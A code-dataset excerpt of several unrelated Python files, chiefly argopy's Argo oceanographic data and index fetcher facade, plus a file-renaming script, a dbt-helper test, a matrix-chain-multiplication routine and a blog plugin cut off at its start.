The facade should be able to work with all available data access point,
"""
import warnings
from argopy.options import OPTIONS, _VALIDATORS
from .errors import InvalidFetcherAccessPoint, InvalidFetcher
from .utilities import list_available_data_src, list_available_index_src
from .plotters import plot_trajectory, plot_dac, plot_profilerType
AVAILABLE_DATA_SOURCES = list_available_data_src()
AVAILABLE_INDEX_SOURCES = list_available_index_src()
class ArgoDataFetcher(object):
""" Fetch and process Argo data.
Can return data selected from:
- one or more float(s), defined by WMOs
- one or more profile(s), defined for one WMO and one or more CYCLE NUMBER
- a space/time rectangular domain, defined by lat/lon/pres/time range
Can return data from the regular Argo dataset ('phy': temperature, salinity) and the Argo referenced
dataset used in DMQC ('ref': temperature, salinity).
This is the main API facade.
Specify here all options to data_fetchers.
Parameters
----------
mode : str
src : str
ds : str
"""
def __init__(self,
mode: str = "",
src: str = "",
ds: str = "",
**fetcher_kwargs):
"""
Parameters
----------
mode : str
User mode. Set to OPTIONS['mode'] by default.
ds : str
Name of the dataset to load. Use the global OPTIONS['dataset'] by default.
src : str
Source of the data to use. Use the global OPTIONS['src'] by default.
**fetcher_kwargs
Used to pass arguments specific to a data source.
"""
# Facade options:
self._mode = OPTIONS['mode'] if mode == '' else mode
self._dataset_id = OPTIONS['dataset'] if ds == '' else ds
self._src = OPTIONS['src'] if src == '' else src
_VALIDATORS['mode'](self._mode)
_VALIDATORS['src'](self._src)
_VALIDATORS['dataset'](self._dataset_id)
# Load data source access points:
if self._src not in AVAILABLE_DATA_SOURCES:
raise InvalidFetcher("Requested data fetcher '%s' not available ! Please try again with any of: %s"
% (self._src, "\n".join(AVAILABLE_DATA_SOURCES)))
else:
Fetchers = AVAILABLE_DATA_SOURCES[self._src]
# Auto-discovery of access points for this fetcher:
# rq: Access point names for the facade are not the same as the access point of fetchers
self.valid_access_points = ['profile', 'float', 'region']
self.Fetchers = {}
for p in Fetchers.access_points:
if p == 'wmo': # Required for 'profile' and 'float'
self.Fetchers['profile'] = Fetchers.Fetch_wmo
self.Fetchers['float'] = Fetchers.Fetch_wmo
if p == 'box': # Required for 'region'
self.Fetchers['region'] = Fetchers.Fetch_box
# Init sub-methods:
self.fetcher = None
if ds is None:
ds = Fetchers.dataset_ids[0]
self.fetcher_options = {**{'ds': ds}, **fetcher_kwargs}
self.postproccessor = self.__empty_processor
self._AccessPoint = None
# Dev warnings
# Todo Clean-up before each release
if self._dataset_id == 'bgc' and self._mode == 'standard':
warnings.warn(" 'BGC' dataset fetching in 'standard' user mode is not reliable. "
"Try to switch to 'expert' mode if you encounter errors.")
def __repr__(self):
if self.fetcher:
summary = [self.fetcher.__repr__()]
summary.append("Backend: %s" % self._src)
summary.append("User mode: %s" % self._mode)
else:
summary = ["<datafetcher 'Not initialised'>"]
summary.append("Backend: %s" % self._src)
summary.append("Fetchers: %s" % ", ".join(self.Fetchers.keys()))
summary.append("User mode: %s" % self._mode)
return "\n".join(summary)
def __empty_processor(self, xds):
""" Do nothing to a dataset """
return xds
def __getattr__(self, key):
""" Validate access points """
# print("key", key)
valid_attrs = ['Fetchers', 'fetcher', 'fetcher_options', 'postproccessor']
if key not in self.valid_access_points and key not in valid_attrs:
raise InvalidFetcherAccessPoint("'%s' is not a valid access point" % key)
pass
def dashboard(self, **kw):
try:
return self.fetcher.dashboard(**kw)
except Exception as e:
warnings.warn("dashboard not avaible for this fetcher access point (%s/%s)" % (self._src, self._AccessPoint))
def float(self, wmo, **kw):
""" Fetch data from a float """
if "CYC" in kw or "cyc" in kw:
raise TypeError("float() got an unexpected keyword argument 'cyc'. Use 'profile' access "
"point to fetch specific profile data.")
if 'float' in self.Fetchers:
self.fetcher = self.Fetchers['float'](WMO=wmo, **self.fetcher_options)
self._AccessPoint = 'float' # Register the requested access point
else:
raise InvalidFetcherAccessPoint("'float' not available with '%s' src" % self._src)
if self._mode == 'standard' and self._dataset_id != 'ref':
def postprocessing(xds):
xds = self.fetcher.filter_data_mode(xds)
xds = self.fetcher.filter_qc(xds)
xds = self.fetcher.filter_variables(xds, self._mode)
return xds
self.postproccessor = postprocessing
return self
def profile(self, wmo, cyc):
""" Fetch data from a profile
given one or more WMOs and CYCLE_NUMBER
"""
if 'profile' in self.Fetchers:
self.fetcher = self.Fetchers['profile'](WMO=wmo, CYC=cyc, **self.fetcher_options)
self._AccessPoint = 'profile' # Register the requested access point
else:
raise InvalidFetcherAccessPoint("'profile' not available with '%s' src" % self._src)
if self._mode == 'standard' and self._dataset_id != 'ref':
def postprocessing(xds):
xds = self.fetcher.filter_data_mode(xds)
xds = self.fetcher.filter_qc(xds)
xds = self.fetcher.filter_variables(xds, self._mode)
return xds
self.postproccessor = postprocessing
return self
def region(self, box: list):
""" Fetch data from a space/time domain
Parameters
----------
box: list(lon_min: float, lon_max: float, lat_min: float, lat_max: float, pres_min: float, pres_max: float,
date_min: str, date_max: str)
Define the domain to load all Argo data for. Longitude, latitude and pressure bounds are required, while
the two bounding dates [date_min and date_max] are optional. If not specificied, the entire time series
is requested.
Returns
-------
:class:`argopy.DataFetcher` with an access point initialized.
"""
if 'region' in self.Fetchers:
self.fetcher = self.Fetchers['region'](box=box, **self.fetcher_options)
self._AccessPoint = 'region' # Register the requested access point
else:
raise InvalidFetcherAccessPoint("'region' not available with '%s' src" % self._src)
if self._mode == 'standard' and self._dataset_id != 'ref':
def postprocessing(xds):
xds = self.fetcher.filter_data_mode(xds)
xds = self.fetcher.filter_qc(xds)
xds = self.fetcher.filter_variables(xds, self._mode)
return xds
self.postproccessor = postprocessing
return self
def to_xarray(self, **kwargs):
""" Fetch and return data as xarray.DataSet
Returns
-------
:class:`xarray.DataArray`
"""
# if not self.fetcher:
# raise InvalidFetcher(" Initialize an access point (%s) first." %
# ",".join(self.Fetchers.keys()))
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
xds = self.fetcher.to_xarray(**kwargs)
xds = self.postproccessor(xds)
return xds
def to_dataframe(self, **kwargs):
""" Fetch and return data as pandas.Dataframe """
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
return self.to_xarray(**kwargs).to_dataframe()
def clear_cache(self):
""" Clear fetcher cached data """
return self.fetcher.clear_cache()
class ArgoIndexFetcher(object):
"""
Specs discussion :
https://github.com/euroargodev/argopy/issues/8
https://github.com/euroargodev/argopy/pull/6)
Usage:
from argopy import ArgoIndexFetcher
idx = ArgoIndexFetcher.region([-75, -65, 10, 20])
idx.plot.trajectories()
idx.to_dataframe()
Fetch and process Argo index.
Can return metadata from index of :
- one or more float(s), defined by WMOs
- one or more profile(s), defined for one WMO and one or more CYCLE NUMBER
- a space/time rectangular domain, defined by lat/lon/pres/time range
idx object can also be used as an input :
argo_loader = ArgoDataFetcher(index=idx)
Specify here all options to data_fetchers
"""
def __init__(self,
mode: str = "",
src: str = "",
**fetcher_kwargs):
# Facade options:
self._mode = OPTIONS['mode'] if mode == '' else mode
self._src = OPTIONS['src'] if src == '' else src
_VALIDATORS['mode'](self._mode)
_VALIDATORS['src'](self._src)
# Load data source access points:
if self._src not in AVAILABLE_INDEX_SOURCES:
raise InvalidFetcher("Requested index fetcher '%s' not available ! "
"Please try again with any of: %s" % (self._src, "\n".join(AVAILABLE_INDEX_SOURCES)))
else:
Fetchers = AVAILABLE_INDEX_SOURCES[self._src]
# Auto-discovery of access points for this fetcher:
# rq: Access point names for the facade are not the same as the access point of fetchers
self.valid_access_points = ['profile', 'float', 'region']
self.Fetchers = {}
for p in Fetchers.access_points:
if p == 'wmo': # Required for 'profile' and 'float'
self.Fetchers['profile'] = Fetchers.Fetcher_wmo
self.Fetchers['float'] = Fetchers.Fetcher_wmo
if p == 'box': # Required for 'region'
self.Fetchers['region'] = Fetchers.Fetcher_box
# Init sub-methods:
self.fetcher = None
self.fetcher_options = {**fetcher_kwargs}
self.postproccessor = self.__empty_processor
self._AccessPoint = None
def __repr__(self):
if self.fetcher:
summary = [self.fetcher.__repr__()]
summary.append("User mode: %s" % self._mode)
else:
summary = ["<indexfetcher 'Not initialised'>"]
summary.append("Fetchers: %s" % ", ".join(self.Fetchers.keys()))
summary.append("User mode: %s" % self._mode)
return "\n".join(summary)
def __empty_processor(self, xds):
""" Do nothing to a dataset """
return xds
def __getattr__(self, key):
""" Validate access points """
valid_attrs = ['Fetchers', 'fetcher', 'fetcher_options', 'postproccessor']
if key not in self.valid_access_points and key not in valid_attrs:
raise InvalidFetcherAccessPoint("'%s' is not a valid access point" % key)
pass
def profile(self, wmo, cyc):
""" Fetch index for a profile
given one or more WMOs and CYCLE_NUMBER
"""
if 'profile' in self.Fetchers:
self.fetcher = self.Fetchers['profile'](WMO=wmo, CYC=cyc, **self.fetcher_options)
self._AccessPoint = 'profile' # Register the requested access point
else:
raise InvalidFetcherAccessPoint("'profile' not available with '%s' src" % self._src)
return self
def float(self, wmo):
""" Load index for one or more WMOs """
if 'float' in self.Fetchers:
self.fetcher = self.Fetchers['float'](WMO=wmo, **self.fetcher_options)
self._AccessPoint = 'float' # Register the requested access point
else:
raise InvalidFetcherAccessPoint("'float' not available with '%s' src" % self._src)
return self
def region(self, box):
""" Load index for a rectangular space/time domain region """
if 'region' in self.Fetchers:
self.fetcher = self.Fetchers['region'](box=box, **self.fetcher_options)
self._AccessPoint = 'region' # Register the requested access point
else:
raise InvalidFetcherAccessPoint("'region' not available with '%s' src" % self._src)
return self
def to_dataframe(self, **kwargs):
""" Fetch index and return pandas.Dataframe """
if not self.fetcher:
raise InvalidFetcher(" Initialize an access point (%s) first." %
",".join(self.Fetchers.keys()))
return self.fetcher.to_dataframe(**kwargs)
def to_xarray(self, **kwargs):
""" Fetch index and return xr.dataset """
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
return self.fetcher.to_xarray(**kwargs)
def to_csv(self, file: str = 'output_file.csv'):
""" Fetch index and return csv """
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
return self.to_dataframe().to_csv(file)
def plot(self, ptype='trajectory'):
""" Create custom plots from index
Parameters
----------
ptype: str
Type of plot to generate. This can be: 'trajectory',' profiler', 'dac'.
Returns
-------
fig : :class:`matplotlib.pyplot.figure.Figure`
Figure instance
"""
idx = self.to_dataframe()
if ptype == 'dac':
return plot_dac(idx)
elif ptype == 'profiler':
return plot_profilerType(idx)
elif ptype == 'trajectory':
return plot_trajectory(idx.sort_values(['file']))
else:
raise ValueError("Type of plot unavailable. Use: 'dac', 'profiler' or 'trajectory' (default)")
def clear_cache(self):
""" Clear fetcher cached data """
return self.fetcher.clear_cache()
| 39.075949 | 121 | 0.593456 |
import warnings
from argopy.options import OPTIONS, _VALIDATORS
from .errors import InvalidFetcherAccessPoint, InvalidFetcher
from .utilities import list_available_data_src, list_available_index_src
from .plotters import plot_trajectory, plot_dac, plot_profilerType
AVAILABLE_DATA_SOURCES = list_available_data_src()
AVAILABLE_INDEX_SOURCES = list_available_index_src()
class ArgoDataFetcher(object):
def __init__(self,
mode: str = "",
src: str = "",
ds: str = "",
**fetcher_kwargs):
self._mode = OPTIONS['mode'] if mode == '' else mode
self._dataset_id = OPTIONS['dataset'] if ds == '' else ds
self._src = OPTIONS['src'] if src == '' else src
_VALIDATORS['mode'](self._mode)
_VALIDATORS['src'](self._src)
_VALIDATORS['dataset'](self._dataset_id)
if self._src not in AVAILABLE_DATA_SOURCES:
raise InvalidFetcher("Requested data fetcher '%s' not available ! Please try again with any of: %s"
% (self._src, "\n".join(AVAILABLE_DATA_SOURCES)))
else:
Fetchers = AVAILABLE_DATA_SOURCES[self._src]
self.valid_access_points = ['profile', 'float', 'region']
self.Fetchers = {}
for p in Fetchers.access_points:
if p == 'wmo':
self.Fetchers['profile'] = Fetchers.Fetch_wmo
self.Fetchers['float'] = Fetchers.Fetch_wmo
if p == 'box':
self.Fetchers['region'] = Fetchers.Fetch_box
self.fetcher = None
if ds is None:
ds = Fetchers.dataset_ids[0]
self.fetcher_options = {**{'ds': ds}, **fetcher_kwargs}
self.postproccessor = self.__empty_processor
self._AccessPoint = None
if self._dataset_id == 'bgc' and self._mode == 'standard':
warnings.warn(" 'BGC' dataset fetching in 'standard' user mode is not reliable. "
"Try to switch to 'expert' mode if you encounter errors.")
def __repr__(self):
if self.fetcher:
summary = [self.fetcher.__repr__()]
summary.append("Backend: %s" % self._src)
summary.append("User mode: %s" % self._mode)
else:
summary = ["<datafetcher 'Not initialised'>"]
summary.append("Backend: %s" % self._src)
summary.append("Fetchers: %s" % ", ".join(self.Fetchers.keys()))
summary.append("User mode: %s" % self._mode)
return "\n".join(summary)
def __empty_processor(self, xds):
return xds
def __getattr__(self, key):
valid_attrs = ['Fetchers', 'fetcher', 'fetcher_options', 'postproccessor']
if key not in self.valid_access_points and key not in valid_attrs:
raise InvalidFetcherAccessPoint("'%s' is not a valid access point" % key)
pass
def dashboard(self, **kw):
try:
return self.fetcher.dashboard(**kw)
except Exception as e:
warnings.warn("dashboard not avaible for this fetcher access point (%s/%s)" % (self._src, self._AccessPoint))
def float(self, wmo, **kw):
if "CYC" in kw or "cyc" in kw:
raise TypeError("float() got an unexpected keyword argument 'cyc'. Use 'profile' access "
"point to fetch specific profile data.")
if 'float' in self.Fetchers:
self.fetcher = self.Fetchers['float'](WMO=wmo, **self.fetcher_options)
self._AccessPoint = 'float'
else:
raise InvalidFetcherAccessPoint("'float' not available with '%s' src" % self._src)
if self._mode == 'standard' and self._dataset_id != 'ref':
def postprocessing(xds):
xds = self.fetcher.filter_data_mode(xds)
xds = self.fetcher.filter_qc(xds)
xds = self.fetcher.filter_variables(xds, self._mode)
return xds
self.postproccessor = postprocessing
return self
def profile(self, wmo, cyc):
if 'profile' in self.Fetchers:
self.fetcher = self.Fetchers['profile'](WMO=wmo, CYC=cyc, **self.fetcher_options)
self._AccessPoint = 'profile'
else:
raise InvalidFetcherAccessPoint("'profile' not available with '%s' src" % self._src)
if self._mode == 'standard' and self._dataset_id != 'ref':
def postprocessing(xds):
xds = self.fetcher.filter_data_mode(xds)
xds = self.fetcher.filter_qc(xds)
xds = self.fetcher.filter_variables(xds, self._mode)
return xds
self.postproccessor = postprocessing
return self
def region(self, box: list):
if 'region' in self.Fetchers:
self.fetcher = self.Fetchers['region'](box=box, **self.fetcher_options)
self._AccessPoint = 'region'
else:
raise InvalidFetcherAccessPoint("'region' not available with '%s' src" % self._src)
if self._mode == 'standard' and self._dataset_id != 'ref':
def postprocessing(xds):
xds = self.fetcher.filter_data_mode(xds)
xds = self.fetcher.filter_qc(xds)
xds = self.fetcher.filter_variables(xds, self._mode)
return xds
self.postproccessor = postprocessing
return self
def to_xarray(self, **kwargs):
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
xds = self.fetcher.to_xarray(**kwargs)
xds = self.postproccessor(xds)
return xds
def to_dataframe(self, **kwargs):
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
return self.to_xarray(**kwargs).to_dataframe()
def clear_cache(self):
return self.fetcher.clear_cache()
class ArgoIndexFetcher(object):
def __init__(self,
mode: str = "",
src: str = "",
**fetcher_kwargs):
self._mode = OPTIONS['mode'] if mode == '' else mode
self._src = OPTIONS['src'] if src == '' else src
_VALIDATORS['mode'](self._mode)
_VALIDATORS['src'](self._src)
if self._src not in AVAILABLE_INDEX_SOURCES:
raise InvalidFetcher("Requested index fetcher '%s' not available ! "
"Please try again with any of: %s" % (self._src, "\n".join(AVAILABLE_INDEX_SOURCES)))
else:
Fetchers = AVAILABLE_INDEX_SOURCES[self._src]
self.valid_access_points = ['profile', 'float', 'region']
self.Fetchers = {}
for p in Fetchers.access_points:
if p == 'wmo':
self.Fetchers['profile'] = Fetchers.Fetcher_wmo
self.Fetchers['float'] = Fetchers.Fetcher_wmo
if p == 'box':
self.Fetchers['region'] = Fetchers.Fetcher_box
self.fetcher = None
self.fetcher_options = {**fetcher_kwargs}
self.postproccessor = self.__empty_processor
self._AccessPoint = None
def __repr__(self):
if self.fetcher:
summary = [self.fetcher.__repr__()]
summary.append("User mode: %s" % self._mode)
else:
summary = ["<indexfetcher 'Not initialised'>"]
summary.append("Fetchers: %s" % ", ".join(self.Fetchers.keys()))
summary.append("User mode: %s" % self._mode)
return "\n".join(summary)
def __empty_processor(self, xds):
return xds
def __getattr__(self, key):
valid_attrs = ['Fetchers', 'fetcher', 'fetcher_options', 'postproccessor']
if key not in self.valid_access_points and key not in valid_attrs:
raise InvalidFetcherAccessPoint("'%s' is not a valid access point" % key)
pass
def profile(self, wmo, cyc):
if 'profile' in self.Fetchers:
self.fetcher = self.Fetchers['profile'](WMO=wmo, CYC=cyc, **self.fetcher_options)
self._AccessPoint = 'profile'
else:
raise InvalidFetcherAccessPoint("'profile' not available with '%s' src" % self._src)
return self
def float(self, wmo):
if 'float' in self.Fetchers:
self.fetcher = self.Fetchers['float'](WMO=wmo, **self.fetcher_options)
self._AccessPoint = 'float'
else:
raise InvalidFetcherAccessPoint("'float' not available with '%s' src" % self._src)
return self
def region(self, box):
if 'region' in self.Fetchers:
self.fetcher = self.Fetchers['region'](box=box, **self.fetcher_options)
self._AccessPoint = 'region'
else:
raise InvalidFetcherAccessPoint("'region' not available with '%s' src" % self._src)
return self
def to_dataframe(self, **kwargs):
if not self.fetcher:
raise InvalidFetcher(" Initialize an access point (%s) first." %
",".join(self.Fetchers.keys()))
return self.fetcher.to_dataframe(**kwargs)
def to_xarray(self, **kwargs):
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
return self.fetcher.to_xarray(**kwargs)
def to_csv(self, file: str = 'output_file.csv'):
if self._AccessPoint not in self.valid_access_points:
raise InvalidFetcherAccessPoint(" Initialize an access point (%s) first." % ",".join(self.Fetchers.keys()))
return self.to_dataframe().to_csv(file)
def plot(self, ptype='trajectory'):
idx = self.to_dataframe()
if ptype == 'dac':
return plot_dac(idx)
elif ptype == 'profiler':
return plot_profilerType(idx)
elif ptype == 'trajectory':
return plot_trajectory(idx.sort_values(['file']))
else:
raise ValueError("Type of plot unavailable. Use: 'dac', 'profiler' or 'trajectory' (default)")
def clear_cache(self):
return self.fetcher.clear_cache()
| true | true |
f725fc00d7ebb2835c0b2bf25f77e74b2071941c | 1,732 | py | Python | renameFiles.py | fkorsa/PythonScripts | 3ceb990a4e25eb2ac33c9841f5345de77a456904 | [
"BSD-3-Clause"
] | null | null | null | renameFiles.py | fkorsa/PythonScripts | 3ceb990a4e25eb2ac33c9841f5345de77a456904 | [
"BSD-3-Clause"
] | null | null | null | renameFiles.py | fkorsa/PythonScripts | 3ceb990a4e25eb2ac33c9841f5345de77a456904 | [
"BSD-3-Clause"
] | null | null | null | # Import all dependencies
import re, os, sys
from shutil import copyfile
def GetNewName(oldName, parameters):
"""if (not '.dll' in oldName
and not '.so' in oldName
and not '.eon' in oldName
):
raise ValueError()"""
pattern = r'([a-zA_Z_\.]+)([0-9]+)(.*)'
beginning = re.sub(pattern, r'\1', oldName)
pictureIndex = int(re.sub(pattern, r'\2', oldName)) - 1
ending = re.sub(pattern, r'\3', oldName)
pictureIndexString = str(pictureIndex)
pictureIndexString = ('0' * (5 - len(pictureIndexString))) + pictureIndexString
return beginning + pictureIndexString + ending
def renameFiles(inputFolder, outputFolder, parameters):
if not os.path.exists(outputFolder):
os.mkdir(outputFolder)
# Browse all files and subfolders
for dirname, dirnames, filenames in os.walk(inputFolder):
# Browse all files in current subfolder
filenames.sort(reverse=True)
for filename in filenames:
try:
newFilename = GetNewName(filename, parameters)
inputFile = os.path.join(dirname, filename)
outputFile = os.path.join(outputFolder, newFilename)
print('renaming ' + inputFile + ' into ' + outputFile)
copyfile(inputFile, outputFile)
except ValueError:
print('Wrong filename. Skipping this file.')
if __name__ == "__main__":
inputFolder = ''
outputFolder = ''
if len(sys.argv) < 3:
inputFolder = input('>> Input folder : ')
outputFolder = input('>> Output folder : ')
else:
inputFolder = sys.argv[1]
outputFolder = sys.argv[2]
renameFiles(inputFolder, outputFolder, ['', '', '']) | 36.851064 | 83 | 0.612587 |
import re, os, sys
from shutil import copyfile
def GetNewName(oldName, parameters):
pattern = r'([a-zA_Z_\.]+)([0-9]+)(.*)'
beginning = re.sub(pattern, r'\1', oldName)
pictureIndex = int(re.sub(pattern, r'\2', oldName)) - 1
ending = re.sub(pattern, r'\3', oldName)
pictureIndexString = str(pictureIndex)
pictureIndexString = ('0' * (5 - len(pictureIndexString))) + pictureIndexString
return beginning + pictureIndexString + ending
def renameFiles(inputFolder, outputFolder, parameters):
if not os.path.exists(outputFolder):
os.mkdir(outputFolder)
for dirname, dirnames, filenames in os.walk(inputFolder):
filenames.sort(reverse=True)
for filename in filenames:
try:
newFilename = GetNewName(filename, parameters)
inputFile = os.path.join(dirname, filename)
outputFile = os.path.join(outputFolder, newFilename)
print('renaming ' + inputFile + ' into ' + outputFile)
copyfile(inputFile, outputFile)
except ValueError:
print('Wrong filename. Skipping this file.')
if __name__ == "__main__":
inputFolder = ''
outputFolder = ''
if len(sys.argv) < 3:
inputFolder = input('>> Input folder : ')
outputFolder = input('>> Output folder : ')
else:
inputFolder = sys.argv[1]
outputFolder = sys.argv[2]
renameFiles(inputFolder, outputFolder, ['', '', '']) | true | true |
f725fd65cd9fd0c6626d2ccb18a6ab12c3269b2d | 734 | py | Python | test/integration/006_source_schema_test/test_source_schemas.py | bastienboutonnet/dbt-helper | 7bf56384ae584542eb22adf5431df1854e95ae9b | [
"Apache-2.0"
] | null | null | null | test/integration/006_source_schema_test/test_source_schemas.py | bastienboutonnet/dbt-helper | 7bf56384ae584542eb22adf5431df1854e95ae9b | [
"Apache-2.0"
] | null | null | null | test/integration/006_source_schema_test/test_source_schemas.py | bastienboutonnet/dbt-helper | 7bf56384ae584542eb22adf5431df1854e95ae9b | [
"Apache-2.0"
] | null | null | null | from test.integration.base import DBTIntegrationTest
class SourceSchemaTest(DBTIntegrationTest):
def test_dependencies(self):
self.run_dbt(["run"])
results = self.run_dbthelper(["show_upstream", "d"])
self.assertTrue(len(results) == 5)
results = self.run_dbthelper(["show_downstream", "d"])
self.assertTrue(len(results) == 1)
results = self.run_dbthelper(["show_upstream", "c"])
self.assertTrue(len(results) == 4)
results = self.run_dbthelper(["show_downstream", "c"])
self.assertTrue(len(results) == 2)
def test_compare(self):
self.run_dbt(["run"])
results = self.run_dbthelper(["compare"])
self.assertTrue(len(results) == 0)
| 36.7 | 62 | 0.638965 | from test.integration.base import DBTIntegrationTest
class SourceSchemaTest(DBTIntegrationTest):
def test_dependencies(self):
self.run_dbt(["run"])
results = self.run_dbthelper(["show_upstream", "d"])
self.assertTrue(len(results) == 5)
results = self.run_dbthelper(["show_downstream", "d"])
self.assertTrue(len(results) == 1)
results = self.run_dbthelper(["show_upstream", "c"])
self.assertTrue(len(results) == 4)
results = self.run_dbthelper(["show_downstream", "c"])
self.assertTrue(len(results) == 2)
def test_compare(self):
self.run_dbt(["run"])
results = self.run_dbthelper(["compare"])
self.assertTrue(len(results) == 0)
| true | true |
f725fe7163265998e318929048c9c017ed7a3eaa | 203 | py | Python | scitbx/suffixtree/single.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 155 | 2016-11-23T12:52:16.000Z | 2022-03-31T15:35:44.000Z | scitbx/suffixtree/single.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 590 | 2016-12-10T11:31:18.000Z | 2022-03-30T23:10:09.000Z | scitbx/suffixtree/single.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
] | 115 | 2016-11-15T08:17:28.000Z | 2022-02-09T15:30:14.000Z | from __future__ import absolute_import, division, print_function
import boost_adaptbx.boost.python as bp
ext = bp.import_ext( "scitbx_suffixtree_single_ext" )
from scitbx_suffixtree_single_ext import *
| 33.833333 | 64 | 0.847291 | from __future__ import absolute_import, division, print_function
import boost_adaptbx.boost.python as bp
ext = bp.import_ext( "scitbx_suffixtree_single_ext" )
from scitbx_suffixtree_single_ext import *
| true | true |
f726009e115fa53dcbb215945e9db16a7b200188 | 1,222 | py | Python | DynamicProgramming/matrixChainMultiplication.py | ZPAVelocity/DataStructureExercise | 39b1cce859e5c46599b3a6e69ac80ade5920aa34 | [
"MIT"
] | null | null | null | DynamicProgramming/matrixChainMultiplication.py | ZPAVelocity/DataStructureExercise | 39b1cce859e5c46599b3a6e69ac80ade5920aa34 | [
"MIT"
] | null | null | null | DynamicProgramming/matrixChainMultiplication.py | ZPAVelocity/DataStructureExercise | 39b1cce859e5c46599b3a6e69ac80ade5920aa34 | [
"MIT"
] | null | null | null | import sys
import numpy as np
def main():
p = [30, 35, 15, 5, 10, 20, 25]
m, s = matrixChainOrder(p)
print('m')
for i in m:
print(i)
print('s')
for i in s:
print(i)
def matrixMultiply(A, B):
if A.shape[1] != B.shape[0]:
print('incompatible dimensions')
return np.array([[]])
C = np.array([[0 for i in range(A.shape[0])] for i in range(B.shape[1])])
for i in range(A.shape[0]):
for j in range(B.shape[1]):
C[i][j] = 0
for k in range(A.shape[1]):
C[i][j] += + A[i][k] * B[k][j]
return C
def matrixChainOrder(p):
n = len(p) - 1
m = [[0 for i in range(n)] for j in range(n)]
s = [[0 for i in range(n)] for j in range(n)]
for i in range(0, n):
m[i][i] = 0
for l in range(2, n + 1): # l is the chain length
for i in range(0, n - l + 1):
j = i + l - 1
m[i][j] = sys.maxsize
for k in range(i, j):
q = m[i][k] + m[k + 1][j] + p[i] * p[k + 1] * p[j + 1]
if q < m[i][j]:
m[i][j] = q
s[i][j] = k + 1
return m, s
if __name__ == "__main__":
main()
| 23.5 | 77 | 0.432079 | import sys
import numpy as np
def main():
p = [30, 35, 15, 5, 10, 20, 25]
m, s = matrixChainOrder(p)
print('m')
for i in m:
print(i)
print('s')
for i in s:
print(i)
def matrixMultiply(A, B):
if A.shape[1] != B.shape[0]:
print('incompatible dimensions')
return np.array([[]])
C = np.array([[0 for i in range(A.shape[0])] for i in range(B.shape[1])])
for i in range(A.shape[0]):
for j in range(B.shape[1]):
C[i][j] = 0
for k in range(A.shape[1]):
C[i][j] += + A[i][k] * B[k][j]
return C
def matrixChainOrder(p):
n = len(p) - 1
m = [[0 for i in range(n)] for j in range(n)]
s = [[0 for i in range(n)] for j in range(n)]
for i in range(0, n):
m[i][i] = 0
for l in range(2, n + 1):
for i in range(0, n - l + 1):
j = i + l - 1
m[i][j] = sys.maxsize
for k in range(i, j):
q = m[i][k] + m[k + 1][j] + p[i] * p[k + 1] * p[j + 1]
if q < m[i][j]:
m[i][j] = q
s[i][j] = k + 1
return m, s
if __name__ == "__main__":
main()
| true | true |
f72600ddc98d2dae8f2a00689368dc6c971a3fb8 | 3,248 | py | Python | nib/plugins/blog.py | jreese/nib | 53308e73aae7d10cdc273ab339bb041b07930a75 | [
"MIT"
] | 10 | 2015-02-03T08:21:16.000Z | 2021-12-24T10:08:57.000Z | nib/plugins/blog.py | jreese/nib | 53308e73aae7d10cdc273ab339bb041b07930a75 | [
"MIT"
] | 4 | 2016-09-22T01:18:30.000Z | 2016-09-23T00:18:38.000Z | nib/plugins/blog.py | jreese/nib | 53308e73aae7d10cdc273ab339bb041b07930a75 | [
"MIT"
] | 2 | 2016-09-22T00:39:31.000Z | 2017-03-16T00:09:47.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
import re
from nib import Document, Processor, before, document
dateregex = re.compile(r'(?P<year>\d\d\d\d)[-./](?P<month>\d\d)[-./](?P<day>\d\d)')
@before
class BlogDateProcessor(Processor):
def document(self, document):
if 'date' in document:
if document.group is None:
document.group = 'blog'
return document
@document('blog')
class BlogDocumentProcessor(Processor):
def process(self, documents, resources):
archives = self.options['blog']['archive']
uris = self.options['blog']['uris']
templates = self.options['blog']['templates']
blog_pages = {}
def blog_page(name, parent=None, child=None, **kwargs):
path = uris[name].format(**kwargs)
if path not in blog_pages:
page = Document(path=path,
content='',
short='',
template=templates[name],
pages=[],
**kwargs
)
if parent:
parent['pages'].append(page)
blog_pages[path] = page
else:
page = blog_pages[path]
if child:
page['pages'].append(child)
return page
feed_page = blog_page('feed', paginate=False)
index_page = blog_page('index')
archive_page = blog_page('archive', title='Archive', paginate=False)
tags_page = blog_page('tags', title='Tags', paginate=False)
for document in documents:
document['template'] = templates['post']
if type(document['date']) == datetime.date:
date = document['date']
kwargs = {
'date': date,
'year': date.year,
'month': date.month,
'day': date.day,
}
if archives['yearly']:
blog_page('yearly', parent=archive_page, child=document,
title=date.strftime('%Y'), type='year', **kwargs)
if archives['monthly']:
blog_page('monthly', parent=archive_page, child=document,
title=date.strftime('%B %Y'), type='month', **kwargs)
if archives['daily']:
blog_page('daily', parent=archive_page, child=document,
title=date.strftime('%B %d, %Y'), type='day', **kwargs)
if 'tags' in document:
tags = [token.strip() for token in document['tags'].split(',')]
document['tags'] = {}
for tag in tags:
tag_page = blog_page('tag', parent=tags_page, child=document,
title=tag, tag=tag)
document['tags'][tag] = tag_page
feed_page['pages'].append(document)
index_page['pages'].append(document)
documents.extend(blog_pages.values())
return documents, resources
| 36.494382 | 85 | 0.494458 | from __future__ import absolute_import, division, print_function, unicode_literals
import datetime
import re
